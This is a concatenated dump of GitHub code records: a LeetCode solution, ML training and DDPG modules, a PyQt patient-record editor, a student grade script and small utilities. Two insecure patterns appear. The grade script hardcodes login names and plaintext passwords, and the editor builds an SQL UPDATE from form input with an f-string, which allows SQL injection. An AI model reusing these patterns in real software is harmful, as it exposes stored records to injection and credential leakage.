SET\r\n name = 'undefined',\r\n days = 'undefined',\r\n hour = 'undefined',\r\n minutes = 'undefined'\r\n WHERE id = {help_file.active_id}\r\n \"\"\"\r\n help_file.database.update_data(help_file.active_path, query)\r\n\r\n raise NameError # для закрытия окна\r\n","repo_name":"ityas/alarm_clock","sub_path":"notice_win.py","file_name":"notice_win.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3707966331","text":"from typing import Optional\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def kthSmallest(self, root: Optional[TreeNode], k: int) -> int:\n def do_from_left(node: TreeNode):\n if node is None:\n return []\n for item in do_from_left(node.left):\n yield item\n yield node\n for item in do_from_left(node.right):\n yield item\n\n \n for i, item in enumerate(do_from_left(root)):\n if i == k - 1:\n return item.val\n \n","repo_name":"dmp2016/LeetCode","sub_path":"Kth Smallest Element in a BST.py","file_name":"Kth Smallest Element in a BST.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40490076854","text":"import getpass\nimport pandas as pd\nimport matplotlib.pyplot as plt\nnumerics = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']\nwhile True:\n str1=input(\"Enter the UserName: \")\n str2=getpass.getpass(prompt = \"Enter the password: \")\n # to import excelsheet using pandas\n df = pd.read_excel(r\"C:\\Users\\hp\\Desktop\\class record.xlsx\", sheet_name='Attendance')\n df.set_index('Roll Number', inplace=True)\n df1 = pd.read_excel(r\"C:\\Users\\hp\\Desktop\\class record.xlsx\", sheet_name='Sessional Test 1')\n df1.set_index('Roll Number', inplace=True)\n df2 = pd.read_excel(r\"C:\\Users\\hp\\Desktop\\class record.xlsx\", sheet_name='Sessional Test 2')\n df2.set_index('Roll Number', inplace=True)\n df3 = pd.read_excel(r\"C:\\Users\\hp\\Desktop\\class record.xlsx\", sheet_name='EndTerm Exam 1')\n df3.set_index('Roll Number', inplace=True)\n # to check the eligibility of student according to attendance\n if (str1 == \"Ajay Kumar\" and str2 == \"AjayKumar@22\") or (str1 == \"Gunjan Thakur\" and str2 == \"GunjanThakur@22\") or (str1 == \"Gayatri Koshal\" and str2 == \"GayatriKoshal@22\"):\n s=[\"P\",]\n y=[]\n z=[]\n df[\"Total Presence\"] = df.isin(s).sum(1)\n for i in df[\"Total Presence\"]:\n c=(i/(df.shape[1]-2))*100\n if c >= 75:\n y.append(\"Eligible\")\n z.append(c)\n else:\n y.append(\"Not Eligible\")\n z.append(c)\n df[\"Eligibility\"] = y\n df[\"Attendance %\"] = z\n # to find the percentage of students\n S1=int(input(\"\\nEnter the Maximum Marks in each subject: \"))\n df1[\"Total Marks\"]=df1.sum(axis = 1, numeric_only = True)\n df1[\"Percentage %\"]=(df1[\"Total Marks\"]/(len(df1.select_dtypes(include=numerics).columns)*S1))*100\n S2=int(input(\"\\nEnter the Maximum Marks in each subject: \"))\n df2[\"Total Marks\"]=df2.sum(axis = 1, numeric_only = True)\n df2[\"Percentage %\"]=(df2[\"Total Marks\"]/(len(df2.select_dtypes(include=numerics).columns)*S2))*100\n S3=int(input(\"\\nEnter the Maximum Marks in each subject: \"))\n df3[\"Total Marks\"]=df3.sum(axis = 1, numeric_only = True)\n df3[\"Percentage %\"]=(df3[\"Total Marks\"]/(len(df3.select_dtypes(include=numerics).columns)*S3))*100\n data = {\"Roll Number\":df.index , 'Name':df[\"Name\"], 'ST 1':df1[\"MCP\"], 'ST 2':df2[\"MCP\"], 'ETE 1':df3[\"MCP\"]}\n df4 = pd.DataFrame(data)\n df4.set_index('Roll Number', inplace=True)\n data = {\"Roll Number\":df.index , 'Name':df[\"Name\"], 'ST 1':df1[\"Python\"], 'ST 2':df2[\"Python\"], 'ETE 1':df3[\"Python\"]}\n df5 = pd.DataFrame(data)\n df5.set_index('Roll Number', inplace=True)\n data = {\"Roll Number\":df.index , 'Name':df[\"Name\"], 'ST 1':df1[\"Percentage %\"], 'ST 2':df2[\"Percentage %\"], 'ETE 1':df3[\"Percentage %\"]}\n df6 = pd.DataFrame(data)\n df6.set_index('Roll Number', inplace=True)\n # to grade the student for ST1 Result\n grade1 = []\n for i in df1[\"Percentage %\"] :\n if (i >= 90):\n grade1.append(\"A Grade\")\n elif (90 > i >= 80):\n grade1.append(\"B Grade\")\n elif (80 > i >= 70):\n grade1.append(\"C Grade\")\n elif (70 > i >= 60):\n grade1.append(\"D Grade\")\n elif (60 > i >= 40):\n grade1.append(\"E Grade\")\n else:\n grade1.append(\"Fail\")\n df1[\"Grade\"] = grade1\n # to grade the student for ST2 Result\n grade2 = []\n for i in df2[\"Percentage %\"] :\n if(i >= 90):\n grade2.append(\"A Grade\")\n elif(90 > i >= 80):\n grade2.append(\"B Grade\")\n elif(80 > i >= 70):\n grade2.append(\"C Grade\")\n elif(70 > i >= 60):\n grade2.append(\"D Grade\")\n elif(60 > i >= 40):\n grade2.append(\"E Grade\")\n else:\n grade2.append(\"Fail\")\n df2[\"Grade\"] = grade2\n # to grade the student for ETE 1 Result\n grade3 = []\n for i in df3[\"Percentage %\"] :\n if(i >= 90):\n grade3.append(\"A Grade\")\n elif(90 > i >= 80):\n grade3.append(\"B Grade\")\n elif(80 > i >= 70):\n grade3.append(\"C Grade\")\n elif(70 > i >= 60):\n grade3.append(\"D Grade\")\n elif(60 > i >= 40):\n grade3.append(\"E Grade\")\n else:\n grade3.append(\"Fail\")\n df3[\"Grade\"] = grade3\n else:\n print(\"ERROR: 101/102\",end=\"-\")\n # to check the authenticity of the user\n while (str1 == \"Sharad Chauhan\" and str2 == \"SharadChauhan@22\"):\n N = int(input(\"What do you want to do? \"))\n","repo_name":"2210991293/SCM-Project","sub_path":"classrecord.py","file_name":"classrecord.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30901130693","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm # Displays a progress bar\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import Dataset, Subset, DataLoader, random_split, TensorDataset\nimport torchvision.models as models\n\n\n\nimport pickle\n\nfrom sklearn.model_selection import KFold, StratifiedKFold,ShuffleSplit ,train_test_split\n\nimport copy\nimport os\nimport random\n\n\nimport sys,os\nsys.path.append('.')\n\nfrom dataset import EnableDataset\nfrom utils import *\nfrom networks import *\n\n\nfrom itertools import combinations\n\n\ndef run_classifier(mode='bilateral',classifier='CNN',sensor=[\"imu\",\"emg\",\"goin\"],NN_model = None):\n\n\t########## SETTINGS ########################\n\n\tBATCH_SIZE = 32\n\tLEARNING_RATE = 1e-5\n\tWEIGHT_DECAY = 1e-3\n\tNUMB_CLASS = 5\n\tNUB_EPOCH= 200\n\tnumfolds = 10\n\tDATA_LOAD_BOOL = True\n\n\tSAVING_BOOL = True\n\tMODE_SPECIFIC_BOOL= True\n\n\tBAND=10\n\tHOP=10\n\t############################################\n\n\tprint('Number of folds: ', numfolds)\n\n\n\tMODE = mode\n\tCLASSIFIER = classifier\n\tSENSOR = sensor\n\tsensor_str='_'.join(SENSOR)\n\n\n\tMODEL_NAME = './models/Freq-Encoding/bestmodel'+ \\\n\t \t\t'_BATCH_SIZE'+str(BATCH_SIZE)+'_LR'+str(LEARNING_RATE)+'_WD'+str(WEIGHT_DECAY)+'_EPOCH'+str(NUB_EPOCH)+'_BAND'+str(BAND)+'_HOP'+str(HOP)+'.pth'\n\n\t# RESULT_NAME= './results/Freq-Encoding/accuracy'+ \\\n\t \t\t# '_BATCH_SIZE'+str(BATCH_SIZE)+'_LR'+str(LEARNING_RATE)+'_WD'+str(WEIGHT_DECAY)+'_EPOCH'+str(NUB_EPOCH)+'.txt'\n\n\n\tRESULT_NAME= './results/'+CLASSIFIER+'/'+CLASSIFIER+'_'+MODE+'_'+sensor_str+'_BAND'+str(BAND)+'_HOP'+str(HOP)+'_accuracy.txt'\n\n\tSAVE_NAME= './checkpoints/'+CLASSIFIER+'/'+CLASSIFIER+'_'+MODE+'_'+sensor_str+'_BAND'+str(BAND)+'_HOP'+str(HOP)+'mode_specific'+'.pkl'\n\n\tif not os.path.exists('./models/Freq-Encoding'):\n\t\tos.makedirs('./models/Freq-Encoding')\n\n\n\tif not os.path.exists('./results/'+CLASSIFIER):\n\t\tos.makedirs('./results/'+CLASSIFIER)\n\n\tif not os.path.exists('./checkpoints/'+CLASSIFIER):\n\t\tos.makedirs('./checkpoints/'+CLASSIFIER)\n\n\t# if not os.path.exists('./results/Freq-Encoding'):\n\t# \tos.makedirs('./results/Freq-Encoding')\n\n\n\t# Load the dataset and train, val, test splits\n\tprint(\"Loading datasets...\")\n\n\tspectrogramTime = 0.0\n\tif SAVING_BOOL:\n\n\t\tBIO_train= EnableDataset(subject_list= ['156','185','186','188','189','190', '191', '192', '193', '194'],data_range=(1, 51),bands=BAND,hop_length=HOP,model_type=CLASSIFIER,sensors=SENSOR,mode=MODE,mode_specific = MODE_SPECIFIC_BOOL)\n\t\tspectrogramTime += BIO_train.spectrogramTime\n\t\tsave_object(BIO_train,SAVE_NAME)\n\telse:\n\t\twith open(SAVE_NAME, 'rb') as input:\n\t\t BIO_train = pickle.load(input)\n\t# BIO_train= EnableDataset(subject_list= ['156'],data_range=(1, 8),bands=BAND,hop_length=HOP,model_type=CLASSIFIER,sensors=SENSOR,mode=MODE,mode_specific = MODE_SPECIFIC_BOOL)\n\n\n\n\n\n\tINPUT_NUM=BIO_train.input_numb\n\n\twholeloader = DataLoader(BIO_train, batch_size=len(BIO_train))\n\n\n\tdevice = \"cuda\" if torch.cuda.is_available() else \"cpu\" # Configure device\n\tprint('GPU USED?',torch.cuda.is_available())\n\n\tif NN_model == 'RESNET18':\n\t\tmodel = MyResNet18() # use resnet\n\t\tmodel.conv1 = nn.Conv2d(INPUT_NUM, 64, kernel_size=5, stride=1, padding=2)\n\t\tmodel.fc = nn.Linear(517 ,NUMB_CLASS)\n\telse:\n\t\tmodel = Network_modespecific(INPUT_NUM,NUMB_CLASS)\n\tmodel = model.to(device)\n\n\tcriterion = nn.CrossEntropyLoss()\n\toptimizer = optim.Adam(model.parameters(), lr=LEARNING_RATE, weight_decay=WEIGHT_DECAY)\n\tnum_epoch = NUB_EPOCH\n\n\tinit_state = copy.deepcopy(model.state_dict())\n\tinit_state_opt = copy.deepcopy(optimizer.state_dict())\n\n\tone_hot_embed= torch.eye(5)\n\n\tfor batch, label, dtype, prevlabels in tqdm(wholeloader,disable=DATA_LOAD_BOOL):\n\t\tX = batch\n\t\ty = label\n\t\ttypes = dtype\n\t\tprevlabel = prevlabels\n\n\taccuracies =[]\n\tss_accuracies=[]\n\ttr_accuracies=[]\n\tinferenceTime = 0.0\n\ttotal_predictions = 0\n\n\n\tskf = KFold(n_splits = numfolds, shuffle = True)\n\ti = 0\n\n\n\ttrain_class=trainclass(model,optimizer,DATA_LOAD_BOOL,device,criterion,MODEL_NAME)\n\n\tfor train_index, test_index in skf.split(X, y):\n\n\t\tmodel.load_state_dict(init_state)\n\t\toptimizer.load_state_dict(init_state_opt)\n\n\t\tX_train, X_test = X[train_index], X[test_index]\n\t\ty_train, y_test = y[train_index], y[test_index]\n\t\ttypes_train, types_test = types[train_index], types[test_index]\n\t\tonehot_train, onehot_test = one_hot_embed[prevlabel[train_index]], one_hot_embed[prevlabel[test_index]]\n\n\n\t\ttrain_dataset = TensorDataset( X_train, y_train, types_train,onehot_train)\n\t\ttest_dataset = TensorDataset( X_test, y_test, types_test,onehot_test)\n\n\t\ttrainloader = DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True)\n\t\ttestloader = DataLoader(test_dataset, batch_size=BATCH_SIZE)\n\n\t\tprint(\"######################Fold:{}#####################3\".format(i+1))\n\t\ttrain_class.train_modesp(trainloader,num_epoch)\n\n\t\tmodel.load_state_dict(torch.load(MODEL_NAME))\n\n\t\t# print(\"Evaluate on test set\")\n\t\taccs,ss_accs,tr_accs,inf_time,num_preds=train_class.evaluate_modesp(testloader)\n\t\taccuracies.append(accs)\n\t\tss_accuracies.append(ss_accs)\n\t\ttr_accuracies.append(tr_accs)\n\n\t\tinferenceTime += inf_time\n\t\ttotal_predictions += num_preds\n\n\t\ti +=1\n\n\tprint('saved on the results')\n\n\n\t# with open(RESULT_NAME, 'w') as f:\n\t# \tfor item in accuracies:\n\t# \t\tf.write(\"%s\\n\" % item)\n\t# f.close()\n\n\tinferenceTime = inferenceTime/total_predictions\n\n\tprint('writing...')\n\twith open(RESULT_NAME, 'w') as f:\n\t\tf.write('total ')\n\t\tfor item in accuracies:\n\t\t\tf.write(\"%s \" % item)\n\t\tf.write('\\n')\n\t\tf.write('steadystate ')\n\t\tfor item in ss_accuracies:\n\t\t\tf.write(\"%s \" % item)\n\t\tf.write('\\n')\n\t\tf.write('transitional ')\n\t\tfor item in tr_accuracies:\n\t\t\tf.write(\"%s \" % item)\n\t\tf.write('\\n')\n\n\t\tf.write('spectrogram time %s' % spectrogramTime)\n\t\tf.write('\\n')\n\t\tf.write('inference time %s' % inferenceTime)\n\tf.close()\n\n\nclassifiers=['CNN']\nsensors=[\"imu\",\"emg\",\"goin\"]\n# modes = ['bilateral','ipsilateral','contralateral']\nmodes = ['bilateral']\n# NNMODEL = 'RESNET18'\nNNMODEL = 'bionet'\nfor classifier in classifiers:\n\tfor i in range(3,4):\n\t\tfor combo in combinations(sensors,i):\n\t\t\tsensor = [item for item in combo]\n\t\t\tfor mode in modes:\n\t\t\t\tprint(classifier, sensor, mode)\n\t\t\t\trun_classifier(mode=mode,classifier=classifier,sensor=sensor,NN_model = NNMODEL)","repo_name":"Rishi-Patel/Human-Activity-Classification","sub_path":"Freq-Encoding/freq_encoding_mode_train.py","file_name":"freq_encoding_mode_train.py","file_ext":"py","file_size_in_byte":6310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31145127146","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass ReplayBuffer:\n \"\"\"\n A simple FIFO experience replay buffer for DDPG agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size):\n self.obs_buf = np.zeros(combined_shape(size, obs_dim), dtype=np.float32)\n self.obs2_buf = np.zeros(combined_shape(size, obs_dim), dtype=np.float32)\n self.act_buf = np.zeros(combined_shape(size, act_dim), dtype=np.float32)\n self.rew_buf = np.zeros(size, dtype=np.float32)\n self.done_buf = np.zeros(size, dtype=np.float32)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n self.obs_buf[self.ptr] = obs\n self.obs2_buf[self.ptr] = next_obs\n self.act_buf[self.ptr] = act\n self.rew_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr+1) % self.max_size\n self.size = min(self.size+1, self.max_size)\n\n def sample_batch(self, batch_size=32):\n idxs = np.random.randint(0, self.size, size=batch_size)\n batch = dict(obs=self.obs_buf[idxs],\n obs2=self.obs2_buf[idxs],\n act=self.act_buf[idxs],\n rew=self.rew_buf[idxs],\n done=self.done_buf[idxs])\n return {k: torch.as_tensor(v, dtype=torch.float32) for k,v in batch.items()}\n\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=(256,256),\n activation=nn.ReLU):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n act_limit = action_space.high[0]\n\n # build policy and value functions\n self.pi = MLPActor(obs_dim, act_dim, hidden_sizes, activation, act_limit)\n self.q = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation)\n\n def act(self, obs):\n with torch.no_grad():\n return self.pi(obs).numpy()\n\n\nclass MLPActor(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation, act_limit):\n super().__init__()\n pi_sizes = [obs_dim] + list(hidden_sizes) + [act_dim]\n self.pi = mlp(pi_sizes, activation, nn.Tanh)\n self.act_limit = act_limit\n\n def forward(self, obs):\n # Return output from network scaled to action space limits.\n return self.act_limit * self.pi(obs)\n\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.q = mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n\n def forward(self, obs, act):\n q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to ensure q has right shape.\n\n# Set up function for computing DDPG Q-loss\ndef compute_loss_q(data, net, targ_net, gamma):\n o, a, r, o2, d = data['obs'], data['act'], data['rew'], data['obs2'], data['done']\n\n q = net.q(o,a)\n\n # Bellman backup for Q function\n with torch.no_grad():\n q_pi_targ = targ_net.q(o2, targ_net.pi(o2))\n backup = r + gamma * (1 - d) * q_pi_targ\n\n # MSE loss against Bellman backup\n loss_q = ((q - backup)**2).mean()\n\n # Useful info for logging\n loss_info = dict(QVals=q.detach().numpy())\n\n return loss_q, loss_info\n\n# Set up function for computing DDPG pi loss\ndef compute_loss_pi(data, net):\n o = data['obs']\n q_pi = net.q(o, net.pi(o))\n return -q_pi.mean()\n\n\ndef mlp(sizes, activation, output_activation=nn.Identity):\n \"\"\"\n Build generic Neural Net for Actor/Critic.\n Inputs\n Neural Net Size = [Observation Space of Sim x Action Space]\n Activation = ReLU \n Observation Space\n Output\n Action \n \"\"\"\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act(), nn.Dropout()]\n return nn.Sequential(*layers)\n\n\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\n\n","repo_name":"nfragakis/Formulating-Emotions-in-Reinforcement-Learning-Agents","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"13636368894","text":"'''\nGiven json file of landscape with fitness values and csv file with corresponding eigen_cent values\n Read json landscape into parsed_json\n Read eigen_cent values into dictionary\n For every id in json-nodes\n print out json of node - id, group, fitness, eig_cent\n For every link in json-links\n print out as is (to be processed by add fit, eig_cent scores script)\n'''\nimport sys, json\n\ndef file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return i + 1\n\njson_filename = sys.argv[1]\npeaks_filename = sys.argv[2]\noutput_filename = sys.argv[3]\n\nfr_landscape = open(json_filename, \"r\")\nfr_peaks = open(peaks_filename, \"r\")\nfw = open(output_filename, \"w\")\n\nnodes_peaks = list()\n\n\n'''Read nodes of landscape and eigen_cent values from files'''\njson_landscape_string = fr_landscape.read()\nparsed_json = json.loads(json_landscape_string)\n\nfor line in fr_peaks:\n nodes_peaks.append(line.strip())\n\n'''Write Nodes as JSON with all values in output file'''\nfw.write(\"{\\n\\\"nodes\\\": [\\n\")\ni = 0\nfor i in range(0,len(parsed_json[\"nodes\"])):\n node = parsed_json[\"nodes\"][i]\n is_peak = False\n if node[\"id\"] in nodes_peaks:\n print(str(node[\"id\"]))\n is_peak = True\n fw.write(\"{\\\"id\\\":\\\"\" + str(node[\"id\"]) + \"\\\", \\\"fitness\\\":\\\"\" + str(node[\"fitness\"]) + \"\\\", \\\"eigen_cent\\\":\\\"\" + node[\"eigen_cent\"] + \"\\\", \\\"is_peak\\\": \\\"\" + str(is_peak) + \"\\\"}\")\n if i < len(parsed_json[\"nodes\"])-1:\n fw.write(\",\\n\")\n else:\n fw.write(\"\\n\")\n i += 1\n\n'''Write Links as JSON as they are without calculated values in output file'''\nfw.write(\"],\\n\\\"links\\\": [\\n\")\ni = 0\n\nfor i in range(0,len(parsed_json[\"links\"])):\n link = parsed_json[\"links\"][i]\n fw.write(\"{\\\"source\\\":\\\"\" + link[\"source\"] + \"\\\", \\\"target\\\":\\\"\" + link[\"target\"] + \"\\\", \\\"fit_val\\\":\\\"\" + link[\"fit_val\"] + \"\\\", \\\"eigen_val\\\":\\\"\" + link[\"eigen_val\"] +\"\\\"}\")\n if i < len(parsed_json[\"links\"]) - 1:\n fw.write(\",\\n\")\n else:\n fw.write(\"\\n\")\n i += 1\n\nfw.write(\"]\\n}\\n\")\n","repo_name":"thomasgreen79/Landscape_Vis","sub_path":"d3_examples/gen_scripts/add_is_peak_to_final_json.py","file_name":"add_is_peak_to_final_json.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7518550310","text":"from pytorch_lightning import LightningModule, LightningDataModule, seed_everything\nfrom hydra.utils import instantiate, get_class\nfrom omegaconf import DictConfig, OmegaConf\n\n\ndef load_experiment(path: str, checkpoint: str = 'last.ckpt'):\n \"\"\"\n Loads an existing model and its dataloader.\n\n args:\n path (string): The path to the log folder\n checkpoint (string): the name of the checkpoint file\n \"\"\"\n # load conf\n config: DictConfig = OmegaConf.load(path + '/.hydra/config.yaml')\n\n # reinitialize model and datamodule\n model = get_class(config.model._target_)\n datamodule: LightningDataModule = instantiate(config.datamodule)\n datamodule.setup()\n\n if \"seed\" in config:\n seed_everything(config.seed)\n\n model = model.load_from_checkpoint(path + '/checkpoints/' + checkpoint)\n\n return model, datamodule, config\n","repo_name":"kredde/pytorch-lightning-hydra-mlflow","sub_path":"src/utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"21"} +{"seq_id":"43379581034","text":"import os\nimport shutil\nimport sqlite3\n\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QWidget, QDesktopWidget, QApplication, QLineEdit, QComboBox, QPlainTextEdit, QPushButton, \\\n QListWidget, QFileDialog\n\nfrom userdataclass import jsondata\n\n\nclass EditWindow(QWidget):\n def __init__(self, ids):\n super().__init__()\n uic.loadUi(\"ui/editrecord.ui\", self)\n\n # id setting\n self.id = self.findChild(QLineEdit, \"id\")\n self.id.setText(str(ids))\n self.name = self.findChild(QLineEdit, 'name')\n self.age = self.findChild(QLineEdit, 'age')\n self.address = self.findChild(QLineEdit, 'address')\n self.sex = self.findChild(QComboBox, 'sex')\n self.cc = self.findChild(QPlainTextEdit, 'cc')\n self.oe = self.findChild(QPlainTextEdit, 'oe')\n self.rf = self.findChild(QPlainTextEdit, 'rf')\n self.pathreport = self.findChild(QPlainTextEdit, 'pathreport')\n self.addRediology = self.findChild(QPushButton, 'addRediology')\n self.listRediology = self.findChild(QListWidget, 'listRadiology')\n self.addMri = self.findChild(QPushButton, 'addMri')\n self.listMri = self.findChild(QListWidget, 'listMri')\n self.addXray = self.findChild(QPushButton, 'addXray')\n self.listXray = self.findChild(QListWidget, 'listXray')\n self.addCtscan = self.findChild(QPushButton, 'addCtscan')\n self.listCtscan = self.findChild(QListWidget, 'listCtscan')\n self.addPics = self.findChild(QPushButton, 'addPics')\n self.listPics = self.findChild(QListWidget, 'listPics')\n self.dxs = self.findChild(QPlainTextEdit, 'dxs')\n self.comments = self.findChild(QPlainTextEdit, 'comments')\n self.saveChanges = self.findChild(QPushButton, 'savechanges')\n\n self.loadData(ids)\n\n # adding signal to the buttons\n self.addRediology.clicked.connect(self.addRediology_clicked)\n self.addMri.clicked.connect(self.addMri_clicked)\n self.addCtscan.clicked.connect(self.addCtscan_clicked)\n self.addXray.clicked.connect(self.addXray_clicked)\n self.addPics.clicked.connect(self.addPics_clicked)\n self.saveChanges.clicked.connect(self.saveChanges_clicked)\n\n def location_on_the_screen(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def addRediology_clicked(self):\n filepath = QFileDialog.getOpenFileName()\n # print(filepath[0])\n self.listRediology.addItem(filepath[0])\n\n def addMri_clicked(self):\n filepath = QFileDialog.getOpenFileName()\n # print(filepath[0])\n self.listMri.addItem(filepath[0])\n\n def addCtscan_clicked(self):\n filepath = QFileDialog.getOpenFileName()\n # print(filepath[0])\n self.listCtscan.addItem(filepath[0])\n\n def addXray_clicked(self):\n filepath = QFileDialog.getOpenFileName()\n # print(filepath[0])\n self.listXray.addItem(filepath[0])\n\n def addPics_clicked(self):\n filepath = QFileDialog.getOpenFileName()\n # print(filepath[0])\n self.listPics.addItem(filepath[0])\n\n def loadPics(self, jointpath, flag):\n paths = jointpath.split(',')\n if flag == \"radiology\":\n for item in paths:\n self.listRediology.addItem(item)\n elif flag == \"mri\":\n for item in paths:\n self.listMri.addItem(item)\n elif flag == \"xray\":\n for item in paths:\n self.listXray.addItem(item)\n elif flag == \"ctscan\":\n for item in paths:\n self.listCtscan.addItem(item)\n elif flag == \"pics\":\n for item in paths:\n self.listPics.addItem(item)\n\n# this function is for load data from database file\n def loadData(self, id):\n datapath = jsondata()\n database = datapath.getdatapath() + \"/database.db\"\n conn = sqlite3.connect(database)\n sql = \"SELECT * FROM entry WHERE id=\" + str(id)\n cur = conn.cursor()\n for row in cur.execute(sql):\n self.name.setText(row[2])\n if row[3] == \"male\" or row[3] == \"Male\":\n self.sex.setCurrentText(\"Male\")\n elif row[3] == \"female\" or row[3] == \"Female\":\n self.sex.setCurrentText(\"Female\")\n else:\n self.sex.setCurrentText(\"Others\")\n self.age.setText(row[4])\n self.address.setText(row[5])\n self.cc.insertPlainText(row[6])\n self.oe.insertPlainText(row[7])\n self.rf.insertPlainText(row[8])\n self.pathreport.insertPlainText(row[9])\n self.loadPics(row[10], \"radiology\")\n self.loadPics(row[11], \"mri\")\n self.loadPics(row[12], \"xray\")\n self.loadPics(row[13], \"ctscan\")\n self.loadPics(row[14], \"pics\")\n self.dxs.insertPlainText(row[15])\n self.comments.insertPlainText(row[16])\n conn.commit()\n conn.close()\n\n# this function is for save images taken from list, lastly it returns combined files path\n def savePic(self, list, id, flag):\n items = []\n for index in range(list.count()):\n if list.item(index).text() != '':\n items.append(list.item(index))\n datapath = jsondata()\n filepath = datapath.getdatapath()\n files = []\n for item in range(0, len(items)):\n split_tup = os.path.splitext(items[item].text())\n file_name = str(id)+\"_\"+flag+\"_\"+str(item)+split_tup[1]\n if len(items[item].text().split(\"/\"))>1: #just checking that if file already exitst in database or not\n shutil.copy(items[item].text(), filepath+\"/images/\"+file_name)\n files.append(file_name)\n if len(files)>0:\n path = files[0]\n for i in range(1, len(files)):\n path = path + ',' + files[i]\n else:\n path = ''\n return path\n\n def saveChanges_clicked(self):\n id = self.id.text()\n name = self.name.text()\n sex = self.sex.currentText()\n age = self.age.text()\n address = self.address.text()\n cc = self.cc.toPlainText()\n oe = self.oe.toPlainText()\n rf = self.rf.toPlainText()\n pathreport = self.pathreport.toPlainText()\n # radiology = self.printlist(self.listRediology)\n # mri = self.printlist(self.listMri)\n # ctscan = self.printlist(self.listCtscan)\n # xray = self.printlist(self.listXray)\n # pics = self.printlist(self.listPics)\n dxs = self.dxs.toPlainText()\n comments = self.comments.toPlainText()\n\n # saving pics\n radiology = self.savePic(self.listRediology,id,\"Rediology\")\n mri = self.savePic(self.listMri,id,\"Mri\")\n xray = self.savePic(self.listXray,id,\"Xray\")\n ctscan = self.savePic(self.listCtscan,id,\"Ctscan\")\n pics = self.savePic(self.listPics,id,\"Pics\")\n\n # insering data to database\n datapath = jsondata()\n database = datapath.getdatapath()+\"/database.db\"\n conn = sqlite3.connect(database)\n sql = f\"UPDATE entry SET Name='{name}', Sex='{sex}', Age='{age}', Address='{address}', CC='{cc}', OE='{oe}', RF='{rf}', Path='{pathreport}', Rediology='{radiology}', Mri='{mri}', Xray='{xray}', Ctscan='{ctscan}', Pics='{pics}', Dxs='{dxs}', Comments='{comments}' WHERE ID='{str(id)}'\"\n conn.execute(sql)\n conn.commit()\n conn.close()\n\n self.close()\n\n# app = QApplication([])\n# window = EditWindow()\n# window.location_on_the_screen()\n# window.show()\n# app.exec_()","repo_name":"suvashsumon/Patient-Database-Management-System","sub_path":"editItem.py","file_name":"editItem.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39081480365","text":"\"\"\"\nEn este segundo ejercicio, tendréis que crear un archivo py y dentro crearéis una clase Vehículo,\nharéis un objeto de ella, lo guardaréis en un archivo y luego lo cargamos.\n\"\"\"\n\nimport pickle \n\nclass Vehiculo:\n marca = ''\n modelo = ''\n costo = ''\n puertas = ''\n\n def __init__(self, marca, modelo, costo, puertas):\n self.marca = marca\n self.modelo = modelo\n self.costo = costo\n self.puertas = puertas \n\nmyDreamCar = Vehiculo('Lamborghini', 'Sesto Elemento', '1500000', '3')\n\ncarFile = open('Entradas & Salidas/ficheroEj2.bin','xb')\n\ncarFile = open('Entradas & Salidas/ficheroEj2.bin','wb')\npickle.dump(myDreamCar, carFile)\ncarFile.close()\n\ncarFile = open('Entradas & Salidas/ficheroEj2.bin','rb')\nsavedCar = pickle.load(carFile)\ncarFile.close()\n\nprint(savedCar.__repr__())\nprint(savedCar.marca)\nprint(savedCar.modelo)\nprint(savedCar.costo,'$')","repo_name":"iTzBigPerrito/OpenBootcamp","sub_path":"Python/Entradas & Salidas/Ejercicio2 I-O.py","file_name":"Ejercicio2 I-O.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 